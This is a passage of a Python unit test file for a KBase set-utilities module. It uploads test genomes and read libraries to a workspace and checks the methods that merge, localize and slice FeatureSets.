None:\n if name != genome_basename:\n self.__class__.genomeInfo_list[lib_i] = None\n self.__class__.genomeName_list[lib_i] = None\n else:\n return info\n except:\n pass\n\n # 1) transform genbank to kbase genome object and upload to ws\n shared_dir = \"/kb/module/work/tmp\"\n genome_data_file = 'data/genomes/' + genome_basename + '.gbff'\n genome_file = os.path.join(shared_dir, os.path.basename(genome_data_file))\n shutil.copy(genome_data_file, genome_file)\n\n SERVICE_VER = 'release'\n # SERVICE_VER = 'dev'\n GFU = GenomeFileUtil(os.environ['SDK_CALLBACK_URL'],\n token=self.__class__.token,\n service_ver=SERVICE_VER\n )\n print(\n \"UPLOADING genome: \" + genome_basename + \" to WORKSPACE \" + self.getWsName() + \" ...\")\n genome_upload_result = GFU.genbank_to_genome({'file': {'path': genome_file},\n 'workspace_name': self.getWsName(),\n 'genome_name': genome_basename\n })\n # })[0]\n pprint(genome_upload_result)\n genome_ref = genome_upload_result['genome_ref']\n new_obj_info = self.getWsClient().get_object_info_new(\n {'objects': [{'ref': genome_ref}]})[0]\n\n # 2) store it\n if not hasattr(self.__class__, 'genomeInfo_list'):\n self.__class__.genomeInfo_list = []\n self.__class__.genomeName_list = []\n for i in range(lib_i + 1):\n try:\n assigned = self.__class__.genomeInfo_list[i]\n except:\n self.__class__.genomeInfo_list.append(None)\n self.__class__.genomeName_list.append(None)\n\n self.__class__.genomeInfo_list[lib_i] = new_obj_info\n self.__class__.genomeName_list[lib_i] = genome_basename\n return new_obj_info\n\n # call this method to get the WS object info of a Single End Library (will\n # upload the example data if this is the first time the method is called during tests)\n def getSingleEndLibInfo(self, read_lib_basename, lib_i=0):\n if hasattr(self.__class__, 'singleEndLibInfo_list'):\n try:\n info = self.__class__.singleEndLibInfo_list[lib_i]\n name = self.__class__.singleEndLibName_list[lib_i]\n if info != None:\n if name != read_lib_basename:\n self.__class__.singleEndLibInfo_list[lib_i] = None\n self.__class__.singleEndLibName_list[lib_i] = None\n else:\n return info\n except:\n pass\n\n # 1) upload files to shock\n shared_dir = \"/kb/module/work/tmp\"\n forward_data_file = 'data/' + read_lib_basename + '.fwd.fq'\n forward_file = os.path.join(shared_dir, os.path.basename(forward_data_file))\n shutil.copy(forward_data_file, forward_file)\n\n ru = ReadsUtils(os.environ['SDK_CALLBACK_URL'])\n single_end_ref = ru.upload_reads({'fwd_file': forward_file,\n 'sequencing_tech': 'artificial reads',\n 'wsname': self.getWsName(),\n 'name': 'test-' + str(lib_i) + '.se.reads'})['obj_ref']\n\n new_obj_info = self.getWsClient().get_object_info_new(\n {'objects': [{'ref': single_end_ref}]})[0]\n\n # store it\n if not hasattr(self.__class__, 'singleEndLibInfo_list'):\n self.__class__.singleEndLibInfo_list = []\n self.__class__.singleEndLibName_list = []\n for i in range(lib_i + 1):\n try:\n assigned = self.__class__.singleEndLibInfo_list[i]\n except:\n self.__class__.singleEndLibInfo_list.append(None)\n self.__class__.singleEndLibName_list.append(None)\n\n self.__class__.singleEndLibInfo_list[lib_i] = new_obj_info\n self.__class__.singleEndLibName_list[lib_i] = read_lib_basename\n return new_obj_info\n\n # call this method to get the WS object info of a Paired End Library (will\n # upload the example data if this is the first time the method is called during tests)\n def getPairedEndLibInfo(self, read_lib_basename, lib_i=0):\n if hasattr(self.__class__, 'pairedEndLibInfo_list'):\n try:\n 
info = self.__class__.pairedEndLibInfo_list[lib_i]\n name = self.__class__.pairedEndLibName_list[lib_i]\n if info != None:\n if name != read_lib_basename:\n self.__class__.pairedEndLibInfo_list[lib_i] = None\n self.__class__.pairedEndLibName_list[lib_i] = None\n else:\n return info\n except:\n pass\n\n # 1) upload files to shock\n shared_dir = \"/kb/module/work/tmp\"\n forward_data_file = 'data/' + read_lib_basename + '.fwd.fq'\n forward_file = os.path.join(shared_dir, os.path.basename(forward_data_file))\n shutil.copy(forward_data_file, forward_file)\n reverse_data_file = 'data/' + read_lib_basename + '.rev.fq'\n reverse_file = os.path.join(shared_dir, os.path.basename(reverse_data_file))\n shutil.copy(reverse_data_file, reverse_file)\n\n ru = ReadsUtils(os.environ['SDK_CALLBACK_URL'])\n paired_end_ref = ru.upload_reads({'fwd_file': forward_file, 'rev_file': reverse_file,\n 'sequencing_tech': 'artificial reads',\n 'interleaved': 0, 'wsname': self.getWsName(),\n 'name': 'test-' + str(lib_i) + '.pe.reads'})['obj_ref']\n\n new_obj_info = self.getWsClient().get_object_info_new(\n {'objects': [{'ref': paired_end_ref}]})[0]\n\n # store it\n if not hasattr(self.__class__, 'pairedEndLibInfo_list'):\n self.__class__.pairedEndLibInfo_list = []\n self.__class__.pairedEndLibName_list = []\n for i in range(lib_i + 1):\n try:\n assigned = self.__class__.pairedEndLibInfo_list[i]\n except:\n self.__class__.pairedEndLibInfo_list.append(None)\n self.__class__.pairedEndLibName_list.append(None)\n\n self.__class__.pairedEndLibInfo_list[lib_i] = new_obj_info\n self.__class__.pairedEndLibName_list[lib_i] = read_lib_basename\n return new_obj_info\n\n # call this method to get the WS object info of a Single End Library Set (will\n # upload the example data if this is the first time the method is called during tests)\n def getSingleEndLib_SetInfo(self, read_libs_basename_list, refresh=False):\n if hasattr(self.__class__, 'singleEndLib_SetInfo'):\n try:\n info = self.__class__.singleEndLib_SetInfo\n if info != None:\n if refresh:\n self.__class__.singleEndLib_SetInfo = None\n else:\n return info\n except:\n pass\n\n # build items and save each SingleEndLib\n items = []\n for lib_i, read_lib_basename in enumerate(read_libs_basename_list):\n label = read_lib_basename\n lib_info = self.getSingleEndLibInfo(read_lib_basename, lib_i)\n lib_ref = str(lib_info[6]) + '/' + str(lib_info[0]) + '/' + str(lib_info[4])\n print(\"LIB_REF[\" + str(lib_i) + \"]: \" + lib_ref + \" \" + read_lib_basename) # DEBUG\n\n items.append({'ref': lib_ref,\n 'label': label\n # 'data_attachment': ,\n # 'info':\n })\n\n # save readsset\n desc = 'test ReadsSet'\n readsSet_obj = {'description': desc,\n 'items': items\n }\n name = 'TEST_READSET'\n\n new_obj_set_info = self.wsClient.save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseSets.ReadsSet',\n 'data': readsSet_obj,\n 'name': name,\n 'meta': {},\n 'provenance': [\n {\n 'service': 'kb_SetUtilities',\n 'method': 'test_kb_SetUtilities'\n }\n ]\n }]\n })[0]\n\n # store it\n self.__class__.singleEndLib_SetInfo = new_obj_set_info\n return new_obj_set_info\n\n # call this method to get the WS object info of a Paired End Library Set (will\n # upload the example data if this is the first time the method is called during tests)\n def getPairedEndLib_SetInfo(self, read_libs_basename_list, refresh=False):\n if hasattr(self.__class__, 'pairedEndLib_SetInfo'):\n try:\n info = self.__class__.pairedEndLib_SetInfo\n if info != None:\n if refresh:\n 
self.__class__.pairedEndLib_SetInfo = None\n else:\n return info\n except:\n pass\n\n # build items and save each PairedEndLib\n items = []\n for lib_i, read_lib_basename in enumerate(read_libs_basename_list):\n label = read_lib_basename\n lib_info = self.getPairedEndLibInfo(read_lib_basename, lib_i)\n lib_ref = str(lib_info[6]) + '/' + str(lib_info[0]) + '/' + str(lib_info[4])\n lib_type = str(lib_info[2])\n print(\"LIB_REF[\" + str(lib_i) + \"]: \" + lib_ref + \" \" + read_lib_basename) # DEBUG\n print(\"LIB_TYPE[\" + str(lib_i) + \"]: \" + lib_type + \" \" + read_lib_basename) # DEBUG\n\n items.append({'ref': lib_ref,\n 'label': label\n # 'data_attachment': ,\n # 'info':\n })\n\n # save readsset\n desc = 'test ReadsSet'\n readsSet_obj = {'description': desc,\n 'items': items\n }\n name = 'TEST_READSET'\n\n new_obj_set_info = self.wsClient.save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseSets.ReadsSet',\n 'data': readsSet_obj,\n 'name': name,\n 'meta': {},\n 'provenance': [\n {\n 'service': 'kb_SetUtilities',\n 'method': 'test_kb_SetUtilities'\n }\n ]\n }]\n })[0]\n\n # store it\n self.__class__.pairedEndLib_SetInfo = new_obj_set_info\n return new_obj_set_info\n\n ##############\n # UNIT TESTS #\n ##############\n\n #### test_KButil_Localize_FeatureSet():\n ##\n # SKIPPING unittest until method fully debugged and set to active in ui spec.json\n @unittest.skip(\"skipped test_KButil_Localize_FeatureSet()\") # uncomment to skip\n def test_KButil_Localize_FeatureSet_01(self):\n method = 'KButil_Localize_FeatureSet_01'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # input_data\n public_refseq_WS = 'ReferenceDataManager'\n # public_refseq_WS = '19217'\n\n genomeInfo_0 = self.getGenomeInfo('GCF_000287295.1_ASM28729v1_genomic', 0)\n genomeInfo_1 = self.getGenomeInfo('GCF_000306885.1_ASM30688v1_genomic', 1)\n genomeInfo_2 = self.getGenomeInfo('GCF_001439985.1_wTPRE_1.0_genomic', 2)\n genomeInfo_3 = self.getGenomeInfo('GCF_000022285.1_ASM2228v1_genomic', 3)\n\n genome_name_0 = 'GCF_000287295.1'\n genome_name_1 = 'GCF_000306885.1'\n genome_name_2 = 'GCF_001439985.1'\n genome_name_3 = 'GCF_000022285.1'\n\n # genome_ref_0 = self.getWsName() + '/' + str(genomeInfo_0[0])\n genome_ref_0 = public_refseq_WS + '/' + genome_name_0\n genome_ref_1 = self.getWsName() + '/' + str(genomeInfo_1[0])\n genome_ref_2 = self.getWsName() + '/' + str(genomeInfo_2[0])\n # genome_ref_3 = self.getWsName() + '/' + str(genomeInfo_3[0])\n genome_ref_3 = public_refseq_WS + '/' + genome_name_3\n\n feature_id_0 = 'A355_RS00030' # F0F1 ATP Synthase subunit B\n feature_id_1 = 'WOO_RS00195' # F0 ATP Synthase subunit B\n feature_id_2 = 'AOR14_RS04755' # F0 ATP Synthase subunit B\n feature_id_3 = 'WRI_RS01560' # F0 ATP Synthase subunit B\n num_features = 4\n\n # featureSet 1\n num_non_local_genomes = 2\n featureSet_obj_1 = {'description': 'test featureSet 1',\n 'element_ordering': [\n feature_id_0,\n feature_id_1,\n feature_id_2,\n feature_id_3\n ],\n 'elements': {\n feature_id_0: [genome_ref_0],\n feature_id_1: [genome_ref_1],\n feature_id_2: [genome_ref_2],\n feature_id_3: [genome_ref_3]\n }\n }\n provenance = [{}]\n featureSet_info = self.getWsClient().save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseCollections.FeatureSet',\n 'data': featureSet_obj_1,\n 'name': 'test_featureSet_1',\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n\n featureSet_ref_1 = str(featureSet_info[WSID_I]) + '/' + str(\n 
featureSet_info[OBJID_I]) + '/' + str(featureSet_info[VERSION_I])\n featureSet_version_1 = int(featureSet_info[VERSION_I])\n\n # run method\n params = {\n 'workspace_name': self.getWsName(),\n 'input_ref': featureSet_ref_1\n }\n result = self.getImpl().KButil_Localize_FeatureSet(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output featureSet\n output_ref = featureSet_ref_1\n output_type = 'KBaseCollections.FeatureSet'\n info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n self.assertEqual(len(info_list), 1)\n output_info = info_list[0]\n self.assertEqual(int(output_info[VERSION_I]), featureSet_version_1 + 1)\n self.assertEqual(output_info[2].split('-')[0], output_type)\n output_obj = \\\n self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(output_obj['element_ordering']), num_features)\n pass\n\n #### test_KButil_Merge_FeatureSet_Collection_01():\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Merge_FeatureSet_Collection_01()\") # uncomment to skip\n def test_KButil_Merge_FeatureSet_Collection_01(self):\n method = 'KButil_Merge_FeatureSet_Collection_01'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # input_data\n genomeInfo_0 = self.getGenomeInfo('GCF_000287295.1_ASM28729v1_genomic', 0)\n genomeInfo_1 = self.getGenomeInfo('GCF_000306885.1_ASM30688v1_genomic', 1)\n genomeInfo_2 = self.getGenomeInfo('GCF_001439985.1_wTPRE_1.0_genomic', 2)\n genomeInfo_3 = self.getGenomeInfo('GCF_000022285.1_ASM2228v1_genomic', 3)\n\n genome_ref_0 = self.getWsName() + '/' + str(genomeInfo_0[0]) + '/' + str(genomeInfo_0[4])\n genome_ref_1 = self.getWsName() + '/' + str(genomeInfo_1[0]) + '/' + str(genomeInfo_1[4])\n genome_ref_2 = self.getWsName() + '/' + str(genomeInfo_2[0]) + '/' + str(genomeInfo_2[4])\n genome_ref_3 = self.getWsName() + '/' + str(genomeInfo_3[0]) + '/' + str(genomeInfo_3[4])\n\n feature_id_0 = 'A355_RS00030' # F0F1 ATP Synthase subunit B\n feature_id_1 = 'WOO_RS00195' # F0 ATP Synthase subunit B\n feature_id_2 = 'AOR14_RS04755' # F0 ATP Synthase subunit B\n feature_id_3 = 'WRI_RS01560' # F0 ATP Synthase subunit B\n num_merged_features = 4\n\n # featureSet 1\n featureSet_obj_1 = {'description': 'test featureSet 1',\n 'element_ordering': [\n feature_id_0,\n feature_id_1\n ],\n 'elements': {\n feature_id_0: [genome_ref_0],\n feature_id_1: [genome_ref_1]\n }\n }\n provenance = [{}]\n featureSet_info = self.getWsClient().save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseCollections.FeatureSet',\n 'data': featureSet_obj_1,\n 'name': 'test_featureSet_1',\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n\n featureSet_ref_1 = str(featureSet_info[WSID_I]) + '/' + str(\n featureSet_info[OBJID_I]) + '/' + str(featureSet_info[VERSION_I])\n\n # featureSet 2\n featureSet_obj_2 = {'description': 'test featureSet 2',\n 'element_ordering': [\n feature_id_2,\n feature_id_3\n ],\n 'elements': {\n feature_id_2: [genome_ref_2],\n feature_id_3: [genome_ref_3]\n }\n }\n provenance = [{}]\n featureSet_info = self.getWsClient().save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseCollections.FeatureSet',\n 'data': featureSet_obj_2,\n 'name': 'test_featureSet_2',\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n\n featureSet_ref_2 = str(featureSet_info[WSID_I]) + '/' + str(\n featureSet_info[OBJID_I]) + '/' + str(featureSet_info[VERSION_I])\n\n # run 
method\n base_output_name = method + '_output'\n params = {\n 'workspace_name': self.getWsName(),\n 'input_refs': [featureSet_ref_1, featureSet_ref_2],\n 'output_name': base_output_name,\n 'desc': 'test'\n }\n result = self.getImpl().KButil_Merge_FeatureSet_Collection(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n output_name = base_output_name\n output_type = 'KBaseCollections.FeatureSet'\n output_ref = self.getWsName() + '/' + output_name\n info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n self.assertEqual(len(info_list), 1)\n output_info = info_list[0]\n self.assertEqual(output_info[1], output_name)\n self.assertEqual(output_info[2].split('-')[0], output_type)\n output_obj = self.getWsClient().get_objects2(\n {'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(output_obj['element_ordering']), num_merged_features)\n pass\n\n #### test_KButil_Slice_FeatureSets_by_Genomes_01():\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Slice_FeatureSets_by_Genomes_01()\") # uncomment to skip\n def test_KButil_Slice_FeatureSets_by_Genomes_01(self):\n method = 'KButil_Slice_FeatureSets_by_Genomes_01'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # input_data\n genomeInfo_0 = self.getGenomeInfo('GCF_000287295.1_ASM28729v1_genomic', 0)\n genomeInfo_1 = self.getGenomeInfo('GCF_000306885.1_ASM30688v1_genomic', 1)\n genomeInfo_2 = self.getGenomeInfo('GCF_001439985.1_wTPRE_1.0_genomic', 2)\n genomeInfo_3 = self.getGenomeInfo('GCF_000022285.1_ASM2228v1_genomic', 3)\n\n genome_ref_0 = self.getWsName() + '/' + str(genomeInfo_0[0]) + '/' + str(genomeInfo_0[4])\n genome_ref_1 = self.getWsName() + '/' + str(genomeInfo_1[0]) + '/' + str(genomeInfo_1[4])\n genome_ref_2 = self.getWsName() + '/' + str(genomeInfo_2[0]) + '/' + str(genomeInfo_2[4])\n genome_ref_3 = self.getWsName() + '/' + str(genomeInfo_3[0]) + '/' + str(genomeInfo_3[4])\n\n feature_id_0 = 'A355_RS00030' # F0F1 ATP Synthase subunit B\n feature_id_1 = 'WOO_RS00195' # F0 ATP Synthase subunit B\n feature_id_2 = 'AOR14_RS04755' # F0 ATP Synthase subunit B\n feature_id_3 = 'WRI_RS01560' # F0 ATP Synthase subunit B\n num_sliced_features = 2\n\n # featureSet 1\n featureSet_obj_1 = {'description': 'test featureSet 1',\n 'element_ordering': [\n feature_id_0,\n feature_id_1,\n feature_id_2,\n feature_id_3\n ],\n 'elements': {\n feature_id_0: [genome_ref_0],\n feature_id_1: [genome_ref_1],\n feature_id_2: [genome_ref_2],\n feature_id_3: [genome_ref_3]\n }\n }\n provenance = [{}]\n featureSet_info = self.getWsClient().save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseCollections.FeatureSet',\n 'data': featureSet_obj_1,\n 'name': 'test_featureSet_1',\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n\n featureSet_ref_1 = str(featureSet_info[WSID_I]) + '/' + str(\n featureSet_info[OBJID_I]) + '/' + str(featureSet_info[VERSION_I])\n\n # run method\n base_output_name = 'Slice_output'\n params = {\n 'workspace_name': self.getWsName(),\n 'input_featureSet_refs': [featureSet_ref_1],\n 'input_genome_refs': [genome_ref_0, genome_ref_2],\n 'output_name': base_output_name,\n 'desc': 'test'\n }\n result = self.getImpl().KButil_Slice_FeatureSets_by_Genomes(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n output_name = base_output_name\n output_type = 'KBaseCollections.FeatureSet'\n output_ref = self.getWsName() + '/' + output_name\n 
info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n self.assertEqual(len(info_list), 1)\n output_info = info_list[0]\n self.assertEqual(output_info[1], output_name)\n self.assertEqual(output_info[2].split('-')[0], output_type)\n output_obj = \\\n self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(output_obj['element_ordering']), num_sliced_features)\n pass\n\n #### test_KButil_Slice_FeatureSets_by_Genomes_NULL_RESULT():\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Slice_FeatureSets_by_Genomes_NULL_RESULT()\") # uncomment to skip\n def test_KButil_Slice_FeatureSets_by_Genomes_NULL_RESULT(self):\n method = 'KButil_Slice_FeatureSets_by_Genomes_NULL_RESULT'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # input_data\n genomeInfo_0 = self.getGenomeInfo('GCF_000287295.1_ASM28729v1_genomic', 0)\n genomeInfo_1 = self.getGenomeInfo('GCF_000306885.1_ASM30688v1_genomic', 1)\n genomeInfo_2 = self.getGenomeInfo('GCF_001439985.1_wTPRE_1.0_genomic', 2)\n genomeInfo_3 = self.getGenomeInfo('GCF_000022285.1_ASM2228v1_genomic', 3)\n\n genome_ref_0 = self.getWsName() + '/' + str(genomeInfo_0[0]) + '/' + str(genomeInfo_0[4])\n genome_ref_1 = self.getWsName() + '/' + str(genomeInfo_1[0]) + '/' + str(genomeInfo_1[4])\n genome_ref_2 = self.getWsName() + '/' + str(genomeInfo_2[0]) + '/' + str(genomeInfo_2[4])\n genome_ref_3 = self.getWsName() + '/' + str(genomeInfo_3[0]) + '/' + str(genomeInfo_3[4])\n\n feature_id_0 = 'A355_RS00030' # F0F1 ATP Synthase subunit B\n feature_id_1 = 'WOO_RS00195' # F0 ATP Synthase subunit B\n feature_id_2 = 'AOR14_RS04755' # F0 ATP Synthase subunit B\n feature_id_3 = 'WRI_RS01560' # F0 ATP Synthase subunit B\n num_sliced_features = 0\n\n # featureSet 1\n featureSet_obj_1 = {'description': 'test featureSet 1',\n 'element_ordering': [\n feature_id_0,\n feature_id_1,\n feature_id_2\n ],\n 'elements': {\n feature_id_0: [genome_ref_0],\n feature_id_1: [genome_ref_1],\n feature_id_2: [genome_ref_2]\n }\n }\n provenance = [{}]\n featureSet_info = self.getWsClient().save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseCollections.FeatureSet',\n 'data': featureSet_obj_1,\n 'name': 'test_featureSet_1',\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n\n featureSet_ref_1 = str(featureSet_info[WSID_I]) + '/' + str(\n featureSet_info[OBJID_I]) + '/' + str(featureSet_info[VERSION_I])\n\n # run method\n base_output_name = 'Slice_output'\n params = {\n 'workspace_name': self.getWsName(),\n 'input_featureSet_refs': [featureSet_ref_1],\n 'input_genome_refs': [genome_ref_3],\n 'output_name': base_output_name,\n 'desc': 'test'\n }\n result = self.getImpl().KButil_Slice_FeatureSets_by_Genomes(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n # output_name = base_output_name\n # output_type = 'KBaseCollections.FeatureSet'\n # output_ref = self.getWsName()+'/'+output_name\n # info_list = self.getWsClient().get_object_info_new({'objects':[{'ref':output_ref}]})\n # self.assertEqual(len(info_list),1)\n # output_info = info_list[0]\n # self.assertEqual(output_info[1],output_name)\n # self.assertEqual(output_info[2].split('-')[0],output_type)\n # output_obj = self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n # self.assertEqual(len(output_obj['element_ordering']),num_sliced_features)\n pass\n\n #### 
test_KButil_Logical_Slice_Two_FeatureSets_01():\n    ##\n    # HIDE @unittest.skip(\"skipped test_KButil_Logical_Slice_Two_FeatureSets_01()\") # uncomment to skip\n    def test_KButil_Logical_Slice_Two_FeatureSets_01(self):\n        method = 'KButil_Logical_Slice_Two_FeatureSets_01'\n        msg = \"RUNNING: \" + method + \"()\"\n        print(\"\\n\\n\" + msg)\n        print(\"=\" * len(msg) + \"\\n\\n\")\n\n        # input_data\n        genomeInfo_0 = self.getGenomeInfo('GCF_000287295.1_ASM28729v1_genomic', 0)\n        genomeInfo_1 = self.getGenomeInfo('GCF_000306885.1_ASM30688v1_genomic', 1)\n        genomeInfo_2 = self.getGenomeInfo('GCF_001439985.1_wTPRE_1.0_genomic', 2)\n        genomeInfo_3 = self.getGenomeInfo('GCF_000022285.1_ASM2228v1_genomic', 3)\n\n        genome_ref_0 = self.getWsName() + '/' + str(genomeInfo_0[0]) + '/' + str(genomeInfo_0[4])\n        genome_ref_1 = self.getWsName() + '/' + str(genomeInfo_1[0]) + '/' + str(genomeInfo_1[4])\n        genome_ref_2 = self.getWsName() + '/' + str(genomeInfo_2[0]) + '/' + str(genomeInfo_2[4])\n        genome_ref_3 = self.getWsName() + '/' + str(genomeInfo_3[0]) + '/' + str(genomeInfo_3[4])\n\n        feature_id_0 = 'A355_RS00030' # F0F1 ATP Synthase subunit B\n        feature_id_1 = 'WOO_RS00195' # F0 ATP Synthase subunit B\n        feature_id_2 = 'AOR14_RS04755' # F0 ATP Synthase subunit B\n        feature_id_3 = 'WRI_RS01560' # F0 ATP Synthase subunit B\n\n        # featureSet 1\n        featureSet_obj_1 = {'description': 'test featureSet 1',\n                            'element_ordering': [\n                                feature_id_0,\n                                feature_id_1,\n                                feature_id_2\n                            ],\n                            'elements': {\n                                feature_id_0: [genome_ref_0],\n                                feature_id_1: [genome_ref_1],\n                                feature_id_2: [genome_ref_2]\n                            }\n                            }\n        provenance = [{}]\n        featureSet_info = self.getWsClient().save_objects({\n            'workspace': self.getWsName(),\n            'objects': [\n                {\n                    'type': 'KBaseCollections.FeatureSet',\n                    'data': featureSet_obj_1,\n                    'name': 'test_featureSet_1',\n                    'meta': {},\n                    'provenance': provenance\n                }\n            ]})[0]\n\n        featureSet_ref_1 = str(featureSet_info[WSID_I]) + '/' + str(\n            featureSet_info[OBJID_I]) + '/' + str(featureSet_info[VERSION_I])\n\n        # featureSet 2\n        featureSet_obj_2 = {'description': 'test featureSet 2',\n                            'element_ordering': [\n                                feature_id_3,\n                                feature_id_1,\n                                feature_id_2\n                            ],\n                            'elements': {\n                                feature_id_3: [genome_ref_3],\n                                feature_id_1: [genome_ref_1],\n                                feature_id_2: [genome_ref_2]\n                            }\n                            }\n        provenance = [{}]\n        featureSet_info = self.getWsClient().save_objects({\n            'workspace': self.getWsName(),\n            'objects': [\n                {\n                    'type': 'KBaseCollections.FeatureSet',\n                    'data': featureSet_obj_2,\n                    'name': 'test_featureSet_2',\n                    'meta': {},\n                    'provenance': provenance\n                }\n            ]})[0]\n\n        featureSet_ref_2 = str(featureSet_info[WSID_I]) + '/' + str(\n            featureSet_info[OBJID_I]) + '/' + str(featureSet_info[VERSION_I])\n\n        # run method\n        num_sliced_features = 2 # yesA_yesB\n        logical_operator = 'yesA_yesB'\n        base_output_name = 'Slice_output_' + logical_operator\n        params = {\n            'workspace_name': self.getWsName(),\n            'input_featureSet_ref_A': featureSet_ref_1,\n            'input_featureSet_ref_B': featureSet_ref_2,\n            'operator': logical_operator,\n            'output_name': base_output_name,\n            'desc': 'test'\n        }\n        result = self.getImpl().KButil_Logical_Slice_Two_FeatureSets(self.getContext(), params)\n        print('RESULT:')\n        pprint(result)\n\n        # check the output\n        output_name = base_output_name\n        output_type = 'KBaseCollections.FeatureSet'\n        output_ref = self.getWsName() + '/' + output_name\n        info_list = self.getWsClient().get_object_info_new({'objects': [{'ref': output_ref}]})\n        self.assertEqual(len(info_list), 1)\n        output_info = info_list[0]\n        self.assertEqual(output_info[1], output_name)\n        
self.assertEqual(output_info[2].split('-')[0], output_type)\n output_obj = \\\n self.getWsClient().get_objects2({'objects': [{'ref': output_ref}]})['data'][0]['data']\n self.assertEqual(len(output_obj['element_ordering']), num_sliced_features)\n pass\n\n #### test_KButil_Logical_Slice_Two_FeatureSets_02():\n ##\n # HIDE @unittest.skip(\"skipped test_KButil_Logical_Slice_Two_FeatureSets_02()\") # uncomment to skip\n def test_KButil_Logical_Slice_Two_FeatureSets_02(self):\n method = 'KButil_Logical_Slice_Two_FeatureSets_02'\n msg = \"RUNNING: \" + method + \"()\"\n print(\"\\n\\n\" + msg)\n print(\"=\" * len(msg) + \"\\n\\n\")\n\n # input_data\n genomeInfo_0 = self.getGenomeInfo('GCF_000287295.1_ASM28729v1_genomic', 0)\n genomeInfo_1 = self.getGenomeInfo('GCF_000306885.1_ASM30688v1_genomic', 1)\n genomeInfo_2 = self.getGenomeInfo('GCF_001439985.1_wTPRE_1.0_genomic', 2)\n genomeInfo_3 = self.getGenomeInfo('GCF_000022285.1_ASM2228v1_genomic', 3)\n\n genome_ref_0 = self.getWsName() + '/' + str(genomeInfo_0[0]) + '/' + str(genomeInfo_0[4])\n genome_ref_1 = self.getWsName() + '/' + str(genomeInfo_1[0]) + '/' + str(genomeInfo_1[4])\n genome_ref_2 = self.getWsName() + '/' + str(genomeInfo_2[0]) + '/' + str(genomeInfo_2[4])\n genome_ref_3 = self.getWsName() + '/' + str(genomeInfo_3[0]) + '/' + str(genomeInfo_3[4])\n\n feature_id_0 = 'A355_RS00030' # F0F1 ATP Synthase subunit B\n feature_id_1 = 'WOO_RS00195' # F0 ATP Synthase subunit B\n feature_id_2 = 'AOR14_RS04755' # F0 ATP Synthase subunit B\n feature_id_3 = 'WRI_RS01560' # F0 ATP Synthase subunit B\n\n # featureSet 1\n featureSet_obj_1 = {'description': 'test featureSet 1',\n 'element_ordering': [\n feature_id_0,\n feature_id_1,\n feature_id_2\n ],\n 'elements': {\n feature_id_0: [genome_ref_0],\n feature_id_1: [genome_ref_1],\n feature_id_2: [genome_ref_2]\n }\n }\n provenance = [{}]\n featureSet_info = self.getWsClient().save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseCollections.FeatureSet',\n 'data': featureSet_obj_1,\n 'name': 'test_featureSet_1',\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n\n\n featureSet_ref_1 = str(featureSet_info[WSID_I]) + '/' + str(\n featureSet_info[OBJID_I]) + '/' + str(featureSet_info[VERSION_I])\n\n # featureSet 2\n featureSet_obj_2 = {'description': 'test featureSet 2',\n 'element_ordering': [\n feature_id_3,\n feature_id_1,\n feature_id_2\n ],\n 'elements': {\n feature_id_3: [genome_ref_3],\n feature_id_1: [genome_ref_1],\n feature_id_2: [genome_ref_2]\n }\n }\n provenance = [{}]\n featureSet_info = self.getWsClient().save_objects({\n 'workspace': self.getWsName(),\n 'objects': [\n {\n 'type': 'KBaseCollections.FeatureSet',\n 'data': featureSet_obj_2,\n 'name': 'test_featureSet_2',\n 'meta': {},\n 'provenance': provenance\n }\n ]})[0]\n\n\n featureSet_ref_2 = str(featureSet_info[WSID_I]) + '/' + str(\n featureSet_info[OBJID_I]) + '/' + str(featureSet_info[VERSION_I])\n\n # run method\n num_sliced_features = 1 # yesA_noB\n logical_operator = 'yesA_noB'\n base_output_name = 'Slice_output_' + logical_operator\n params = {\n 'workspace_name': self.getWsName(),\n 'input_featureSet_ref_A': featureSet_ref_1,\n 'input_featureSet_ref_B': featureSet_ref_2,\n 'operator': logical_operator,\n 'output_name': base_output_name,\n 'desc': 'test'\n }\n result = self.getImpl().KButil_Logical_Slice_Two_FeatureSets(self.getContext(), params)\n print('RESULT:')\n pprint(result)\n\n # check the output\n output_name = base_output_name\n output_type = 'KBaseCollections.FeatureSet'\n 
